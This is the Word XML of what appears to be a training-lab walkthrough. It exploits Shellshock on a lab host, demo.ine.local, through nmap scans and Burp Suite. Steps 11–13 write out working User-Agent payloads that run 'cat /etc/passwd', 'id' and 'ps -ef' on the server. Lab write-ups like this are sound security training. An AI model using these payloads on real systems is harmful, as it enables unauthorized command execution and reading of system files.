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0021" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>Step 1: Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB57757" w14:textId="321C4930" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21654933" wp14:editId="5C792BBB">
            <wp:extent cx="5943600" cy="3246755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="903490389" name="Picture 15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17A1" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>Step 2: Run Nmap scan on the target to find open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F874FDB" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="650F72A0" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAD5DD0" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="41F4A770" w14:textId="59C82539" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5E3E8F99" w14:textId="7DC76FEA" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="671D4CD5" wp14:editId="6B5FEB41">
            <wp:extent cx="5778797" cy="2228965"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12556472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47244" name="Picture 1255647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D22D" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>Port 80 is open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E6C9E9" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="15DCC704" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 3: Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t xml:space="preserve"> and navigate to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CB8FFC" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="095FA4D8" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3543B455" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="0169EDC2" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>http://demo.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D6B042" w14:textId="6C8E2E20" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="258C6030" wp14:editId="42DD591D">
            <wp:extent cx="5874052" cy="4413477"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="72318696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86962" name="Picture 17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441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B995" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>A website is running at port 80 of the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C0484B" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="1CA243CF" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>Step 4: Right-click and select "View Page Source."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18101885" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="7D8B63CD" w14:textId="51A7A421" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27506812" wp14:editId="6D10A6A9">
            <wp:extent cx="5861351" cy="4527783"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="273805360" name="Picture 1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05360" name="Picture 18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351" cy="452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A9E7" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>A CGI script is running on the target server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E02FBA0" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="637C1ADD" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>Step 5: Use the Nmap NSE script to check if the server is vulnerable to shellshock attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1F8626" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="736A2EED" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B97331B" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="02907A24" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t xml:space="preserve"> --script http-shellshock --script-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t xml:space="preserve"> "http-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>shellshock.uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>gettime.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="50CCDD88" w14:textId="6E10C731" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14B68410" wp14:editId="5D59A2A8">
            <wp:extent cx="5594638" cy="4127712"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="9353809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80955" name="Picture 9353809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412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8657" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>The server is vulnerable to Shellshock attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783DB2EF" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="72067A46" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>Step 6: Search for the available exploit for shellshock vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8DCE94" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="287E428C" w14:textId="761B574E" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11F1495E" wp14:editId="210F7F24">
            <wp:extent cx="5315223" cy="3854648"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9190798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79837" name="Picture 9190798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C0B1" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t xml:space="preserve">Step 7: The GitHub link contains the steps to exploit </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>the vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ABF2E2" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="1491A4DE" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>URL: https://github.com/opsxcq/exploit-CVE-2014-6271</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326E872E" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="49CCE537" w14:textId="453D29FF" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5680EA76" wp14:editId="6B44AAB7">
            <wp:extent cx="5334274" cy="4178515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="500163609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63609" name="Picture 21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4AD7" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t xml:space="preserve">The attacker </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t xml:space="preserve"> craft malicious user-agent </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t xml:space="preserve"> exploit the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257E0E79" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="6FFDEECD" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t xml:space="preserve">Step 8: Configure Firefox to use Burp Suite. Click on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>FoxyProxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t xml:space="preserve"> plugin icon on the top-right of the browser and select "Burp Suite."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBF2D2C" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="3AFB85D7" w14:textId="22C7F5BC" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C2B0470" wp14:editId="1FBB2FBA">
            <wp:extent cx="3727642" cy="368319"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="8846943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94375" name="Picture 8846943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64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52C2" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>Step 9: Start Burp Suite, navigate to proxy, and turn on the intercept.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6455CB85" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="2F707C2F" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="4A6D8E80" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>Reload the page and intercept the request with Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68008E87" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="6516D340" w14:textId="2FC3C4DC" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0463F907" wp14:editId="6CCBAB57">
            <wp:extent cx="5651790" cy="4134062"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="143063567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3567" name="Picture 23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790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30AB" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>Step 10: Right-click and select “Send to Repeater” Option and Navigate to the Repeater tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705ED19B" w14:textId="392533C7" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00AC12B8" w:rsidP="00CA1774">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="634029B0" wp14:editId="5F44C0E2">
            <wp:extent cx="5905804" cy="4273770"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1449222407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22407" name="Picture 24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6EA3" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="5CB30B60" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>Step 11: Modify the User-Agent and inject the malicious payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC85500" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="2F71BD63" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397B5762" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="4BD40AF7" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>{ :; };</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t xml:space="preserve"> echo; echo; /bin/bash -c 'cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>/passwd'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E16F3C5" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="0192B4DF" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>Click on the Send button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74317C7E" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="744C3E4D" w14:textId="7CF21749" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00AC12B8" w:rsidP="00CA1774">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E744A5F" wp14:editId="4D5A2C65">
            <wp:extent cx="5759746" cy="3988005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="880927956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27956" name="Picture 25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0BE8" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>The command executed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7278878A" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="14F4A52F" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>Step 12: Modify the payload to execute the ‘id’ command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0871ACDB" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="0C010A8E" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFE9785" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="28078A0E" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>{ :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>; }; echo; echo; /bin/bash -c 'id'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFB9DE9" w14:textId="08BB11CE" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00AC12B8" w:rsidP="00CA1774">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BA6C3A9" wp14:editId="3D34BC82">
            <wp:extent cx="5473981" cy="3753043"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="996631663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31663" name="Picture 26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B775" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>Step 13: Modify the payload to execute ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>ef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>’ command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBBC5BD" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="579DD361" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC3037B" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774"/>
    <w:p w14:paraId="40697E52" w14:textId="77777777" w:rsidR="00CA1774" w:rsidRPr="00CA1774" w:rsidRDefault="00CA1774" w:rsidP="00CA1774">
      <w:r w:rsidRPr="00CA1774">
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>{ :; };</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t xml:space="preserve"> echo; echo; /bin/bash -c '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>ef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1774">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB2C043" w14:textId="6BED2AEE" w:rsidR="00853ABF" w:rsidRDefault="00AC12B8" w:rsidP="00CA1774">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0494CD92" wp14:editId="7562A6C5">
            <wp:extent cx="5874052" cy="3422826"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="162122047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20478" name="Picture 16212204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34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B8A"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00857B8A"/>
    <w:rsid w:val="00AC00B9"/>
    <w:rsid w:val="00AC12B8"/>
    <w:rsid w:val="00CA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0799"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F642EC5E-5FD6-445C-A23A-EE6E689F3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jpeg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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-17T04:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-17T05:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>